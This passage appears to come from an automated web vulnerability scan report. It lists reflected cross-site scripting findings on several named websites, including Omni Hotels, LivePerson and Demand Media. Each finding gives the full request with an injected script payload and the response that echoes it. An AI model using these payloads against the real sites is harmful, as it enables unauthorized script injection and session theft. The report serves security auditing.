Content-Type: text/javascript
Date: Fri, 30 Sep 2011 13:31:36 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 69
Connection: keep-alive

_jqjsp2bdd9<script>alert(1)</script>48bc918d485({"signed_in":false});

2.93. http://oc.cardsynergy.com/t/ [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oc.cardsynergy.com
Path:   /t/

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c8ea0<script>alert(1)</script>260760df9a6 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /t/?aid=101450&c=22105064c8ea0<script>alert(1)</script>260760df9a6&sid=5259&tid= HTTP/1.1
Host: oc.cardsynergy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.creditcardxpo.net/rd/apply.asp?i=633&p=low-interest-credit-cards.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:25:33 GMT
Server: Apache
Content-Length: 71
Content-Type: text/html

Invalid Clickable ID: 22105064c8ea0<script>alert(1)</script>260760df9a6

2.94. http://pluckit.demandmedia.com/requests [apiKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the apiKey request parameter is copied into the HTML document as plain text between tags. The payload 230fe<script>alert(1)</script>9379866d36a was submitted in the apiKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=39a6e792-10a1-4137-980f-cb14ed150bf2230fe<script>alert(1)</script>9379866d36a&jsonpCallback=dmpod.RequestServiceInstances['pluckit_945141355473'].jsonpCallback&jsonpContext=request_174447800453&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7316%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7316%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7316%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.allgetaways.com/region.asp?areaid=100674
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerPluckit2.Webpool-80=925239050.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7316
Content-Length: 586
Content-Type: application/json; charset=utf-8
Expires: Fri, 30 Sep 2011 13:15:10 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 30 Sep 2011 13:15:10 GMT

dmpod.RequestServiceInstances['pluckit_945141355473'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\":0,\"requestedBy\":\"\",\"message\":\"Unknown customer: 39a6e792-10a1-4137-980f-cb14ed150bf2230fe<script>alert(1)</script>9379866d36a\",\"id\":\"1d80da8f-49f5-473c-8eee-b162152e5246\"}"}],"objectType":"BatchResponse","isError":false,"TTL":0,"ContentTrackingJavaScript":"","ContentTrackingSrc":"","diagnostics":null,"requestedBy":""},'
...[SNIP]...

2.95. http://pluckit.demandmedia.com/requests [jsonpCallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpCallback request parameter is copied into the HTML document as plain text between tags. The payload 762fa<script>alert(1)</script>5cd8169c6c2 was submitted in the jsonpCallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=39a6e792-10a1-4137-980f-cb14ed150bf2&jsonpCallback=dmpod.RequestServiceInstances['pluckit_945141355473'].jsonpCallback762fa<script>alert(1)</script>5cd8169c6c2&jsonpContext=request_174447800453&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7316%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7316%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7316%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.allgetaways.com/region.asp?areaid=100674
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerPluckit2.Webpool-80=925239050.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7316
Content-Length: 665
Content-Type: application/json; charset=utf-8
Expires: Fri, 30 Sep 2011 13:15:16 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 30 Sep 2011 13:15:16 GMT

dmpod.RequestServiceInstances['pluckit_945141355473'].jsonpCallback762fa<script>alert(1)</script>5cd8169c6c2({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\":0,\"requestedBy\":\"\",\"message\":\"U
...[SNIP]...

2.96. http://pluckit.demandmedia.com/requests [jsonpContext parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpContext request parameter is copied into the HTML document as plain text between tags. The payload 5ae86<script>alert(1)</script>1bf0cef4d4 was submitted in the jsonpContext parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=39a6e792-10a1-4137-980f-cb14ed150bf2&jsonpCallback=dmpod.RequestServiceInstances['pluckit_945141355473'].jsonpCallback&jsonpContext=request_1744478004535ae86<script>alert(1)</script>1bf0cef4d4&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7316%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7316%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7316%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.allgetaways.com/region.asp?areaid=100674
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerPluckit2.Webpool-80=925239050.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7316
Content-Length: 664
Content-Type: application/json; charset=utf-8
Expires: Fri, 30 Sep 2011 13:15:22 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 30 Sep 2011 13:15:22 GMT

dmpod.RequestServiceInstances['pluckit_945141355473'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorRespon
...[SNIP]...
-6bfd-4682-bc1e-f586af56845c\"}"}],"objectType":"BatchResponse","isError":false,"TTL":0,"ContentTrackingJavaScript":"","ContentTrackingSrc":"","diagnostics":null,"requestedBy":""},'request_1744478004535ae86<script>alert(1)</script>1bf0cef4d4');

2.97. http://server.iad.liveperson.net/hc/8324495/ [divID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/8324495/

Issue detail

The value of the divID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad5d6'%3balert(1)//b5e0164d28a was submitted in the divID parameter. This input was echoed as ad5d6';alert(1)//b5e0164d28a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hc/8324495/?cmd=mTagRepstate&site=8324495&buttonID=15&divID=lpButDivID-1287434146578ad5d6'%3balert(1)//b5e0164d28a&bt=3&c=1 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.softwaremedia.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1317389382842

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:31:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 18550

function staticButton(objName,divID,buttonName,buttonId,config,state,butHtmlTemplate,server,site,protocol,servlet,windowWidth,windowHeight){this.CHAT=1;this.VOICE=2;this.BUTTON=1;this.CHATBOX=2;this.T
...[SNIP]...
ic)=='undefined') {var lpMTagStatic={};} lpMTagStatic.lpStaticBut13173894894325916503340384666189 = new staticButton('lpMTagStatic.lpStaticBut13173894894325916503340384666189','lpButDivID-1287434146578ad5d6';alert(1)//b5e0164d28a','Footer Link',15,{'id':15,'name':"Footer Link",chanel:1,enabled:true,buttonType:3,voiceType:-1,stickyType:1,description:"Link",buttonContent:1,addTextToButton:true,addTextToButtonText:"Our <strong>
...[SNIP]...

2.98. https://ssl.omnihotels.com/Omni [account_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the account_code request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4bb61><script>alert(1)</script>14adf784d1e was submitted in the account_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /Omni HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
Content-Length: 3257
Cache-Control: max-age=0
Origin: https://ssl.omnihotels.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; Phoenix_state_public=EndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; Phoenix_state_room1=adult_qty%3A1%7CREADME%3A1%7Cchild_qty%3A0; Phoenix_state=zJQuses7Aiwul4cqVwlRWomL3PuNtWJBNTu9MyupeO3X57LW%0Aoe5WtpDl_Vl4gx-B5YZLOFX0vGnhBT3TIbHGR9BKUx_T1F4p%0AY8Cd5EfgsEkGMjexuSRYud2iMDlWpU1gw3GGpWDOBEjBQyol%0AXdlwkCMGm5FsdMady_XLe_ZDTylFx3XEypp3y0BqbpqSc2ff%0A; common=yF0gdYdzar6nR8cTHWxkZg; Phoenix_state_room3=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA

------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="region_city"

CORPUS CHRISTI
------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="hotelCod
...[SNIP]...


------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="room3_child4"


------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="account_code"

4bb61><script>alert(1)</script>14adf784d1e
------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="invBlockCode"


------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="special_rates"

1
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:25:37 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=9de73ca53c6da56b6925e633eebd24ff9d005ccf; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:25:44 GMT
Set-Cookie: Phoenix_state_public=hotelCode%3ACRPTWR%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1b9b87f67bac04027054d9923; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:44 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3Ab9b87f67a6d8b86f520e0dbd%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:44 GMT
Set-Cookie: Phoenix_state_room1=child2%3A%0D%7Cchild3%3A%0D%7Cadult_qty%3A1%7Cchild1%3A%0D%7Cchild4%3A%0D%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:44 GMT
Set-Cookie: Phoenix_state=-AddVW8cHBK52Rlvaau4OHu8_aXdvwPuAExwTRQHUrCr_WOE%0AkUF5BCTM7D0OBDjvSWumt4xlvkHqfieKdH1lyrqtyN0BPnhA%0ATOJRghIPO_uKTQsJbCXmeXPiFFUiBYxpL0kTtK5bO3LUR1KU%0AMAivS8NJJdz-vq2Beh8VgI9-bv0hBCA8HZVe0znWu4AHH18j%0AIV2z0-0RF2WZrv-aPMZvmrfGO1aQvRZ_408RXABMWy2SmIPD%0AdC-bEngsR_HBagu-_Memt8Ly1jvXlu7SuQOhd_PcaHbCDU0X%0AaEETISSwPlTh_8CHiuQDRGsCm3GDYJaiMNFeuKfE-NmhwHr8%0AUkg1TnquWo-FY0OS8py_a0agNBuUGuvCDA3ekIiXQ7eyuuhb%0AKy33bnT4qL1zhMm9abHqXwz96udYe8gN8cBqgiXHNJpY0wss%0Ajs5s-RKaJ7zuJaz6qkZPkioth5MOCiTAzuGBkO22lebSe0PZ%0AzlMnYIWSf-fW4X7mLTD7D7aAUaMGD45nENuMwr-zuyU; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:44 GMT
Set-Cookie: common=1UqSZSurqfyjNv3aMjFBjA; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:44 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3Ab9b87f675fe6579ea886b6c%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:44 GMT
Content-Length: 133632
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
<a style="color:#FFFFCC;" href=?Phoenix_state=clear&pagedst=RR1&hotelCode=CRPTWR&account_code=4BB61><SCRIPT>ALERT(1)</SCRIPT>14ADF784D1E
------WEBKITFORMBOUNDARYRDHZ6ZXVGFAFRCUL
CONTENT-DISPOSITION: FORM-DATA; NAME="INVBLOCKCODE"

&invBlockCode=&rpc_ASC=&rpc_SNR=&rpc_GOV=>
...[SNIP]...

2.99. https://ssl.omnihotels.com/Omni [account_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the account_code request parameter is copied into the name of an HTML tag attribute. The payload a0794><script>alert(1)</script>f26db594f96 was submitted in the account_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /Omni HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
Content-Length: 3257
Cache-Control: max-age=0
Origin: https://ssl.omnihotels.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; Phoenix_state_public=EndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; Phoenix_state_room1=adult_qty%3A1%7CREADME%3A1%7Cchild_qty%3A0; Phoenix_state=zJQuses7Aiwul4cqVwlRWomL3PuNtWJBNTu9MyupeO3X57LW%0Aoe5WtpDl_Vl4gx-B5YZLOFX0vGnhBT3TIbHGR9BKUx_T1F4p%0AY8Cd5EfgsEkGMjexuSRYud2iMDlWpU1gw3GGpWDOBEjBQyol%0AXdlwkCMGm5FsdMady_XLe_ZDTylFx3XEypp3y0BqbpqSc2ff%0A; common=yF0gdYdzar6nR8cTHWxkZg; Phoenix_state_room3=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA

------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="region_city"

CORPUS CHRISTI
------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="hotelCod
...[SNIP]...


------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="room3_child4"


------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="account_code"

a0794><script>alert(1)</script>f26db594f96
------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="invBlockCode"


------WebKitFormBoundaryrDhZ6ZxVGfAfrCUl
Content-Disposition: form-data; name="special_rates"

1
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:25:15 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=9de73ca53c6da56b6925e633eebd24ff9d005ccf; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:25:22 GMT
Set-Cookie: Phoenix_state_public=hotelCode%3ACRPTWR%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1%22; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:22 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A%7CREADME%3A1%22%7Cchild_qty%3A; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:22 GMT
Set-Cookie: Phoenix_state_room1=adult_qty%3A1%7CREADME%3A1%22%7Cchild_qty%3A0; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:22 GMT
Set-Cookie: Phoenix_state=YSGr0xxmMTFbiGpY4nsB9V0bhMjwizkqAja7mEP1RKggH6Y_%0ABeUFY0KAjJ4D7KG7VxLTSs6Bq_ykZ-rt8tzWVyXMGn3Az1sQ%0AMkACv3_V4ZEPPkrrQxW3W0TiuCVr7VxAuhlu-JrohZkc7Z9g%0AikXTI2SNu9jiYVSW-wOyktybClykzPGFwFgkw9HuKKRjL9N7%0Aq0UNSKfJgQwClvdjPYjgiOS6rncqnChrUjFYFigDdKgVfSeh%0AWP4o54mrjBNpwZ5uSBOhBmUy9Y05IFcUqzRn3sDhR7pjtfJQ%0A53duhVJYIhX0nBdCQxv_MkyXJKJwrvbcB7GwK-52LrE3tu5k%0APdhG0XTijQa2LwhsFNuqrkFpMbfm_bNka9Bqh38X3uhJSIgr%0Aql0Ajc1fjXuVZKA4dGrcJL-o2OzBRqLvShffemdZUVF3qyJ-%0AJUAYFXtd6Af98glGfJ0wG7TZaaxK_tRmHzyY9euhs2kZIur6%0AUGTw-uTadfjslP3RizjEld5f376EIJYTdYwhOdLWKfo; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:22 GMT
Set-Cookie: common=P5mBAFWwVgOwT3mMA0o45Q; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:22 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3Ab9b87f675fe6579ea886b6c; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:55:22 GMT
Content-Length: 133633
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
<a style="color:#FFFFCC;" href=?Phoenix_state=clear&pagedst=RR1&hotelCode=CRPTWR&account_code=A0794><SCRIPT>ALERT(1)</SCRIPT>F26DB594F96
------WEBKITFORMBOUNDARYRDHZ6ZXVGFAFRCUL
CONTENT-DISPOSITION: FORM-DATA; NAME="INVBLOCKCODE"

&invBlockCode=&rpc_ASC=&rpc_SNR=&rpc_GOV=>
...[SNIP]...

2.100. https://ssl.omnihotels.com/Omni [account_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the account_code request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 44821><script>alert(1)</script>9e90653bce6 was submitted in the account_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Omni?region_city=CORPUS+CHRISTI&account_code=44821><script>alert(1)</script>9e90653bce6&iata_num=&invBlockCode=&room1_child2=&EndDate=10%2F01%2F2011&room3_child4=&room3_child_qty=0&room2_adult_qty=1&room3_child1=&room3_adult_qty=1&room3_child2=&room3_child3=&room2_child4=&room1_adult_qty=1&pagesrc=RR&room1_child3=&room2_child2=&room_number=1&StartDate=09%2F30%2F2011&room2_child_qty=0&rate_summary_type=package&room1_child1=&room2_child1=&pagedst=RR1_2&hotelCode=&room_qty=1&special_rates=1&room1_child_qty=0&splash=0&room1_child4=&room2_child3= HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA; phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; Phoenix_state_public=EndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state_room1=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; Phoenix_state=1mkhF0sCdFn2lRalDgvU22H5LAkbZtXWGORshrBGNFBsGF7Q%0ApH71_35RKY3JH4yi_nXgyreYesvZL1BhKEVNDCGJdY3sCf2I%0AYnJ518lstWvA1XBTMK4WfH3NSM5pv7D-9NChb5HRKja5KzIN%0AgmgWKIsqylamChUeMf7kW6iciVEbCKelt6RhzTjzyDGydPmJ%0AWNm1X7QkhTdiNenZVpvBrBTWc2FIQ7Pq; common=Y5JsAspErFJ6DDWEUyhCKg; Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:24 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:17:29 GMT
Set-Cookie: Phoenix_state_public=EndDate%3A10%2F01%2F2011%7ChotelCode%3ACRPTWR%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1b9b87f675f0c9f19dc4efc07; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:29 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1b9b87f67c22aa140b16f82fe; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:29 GMT
Set-Cookie: Phoenix_state_room1=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1b9b87f6783644434bc0b904e; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:29 GMT
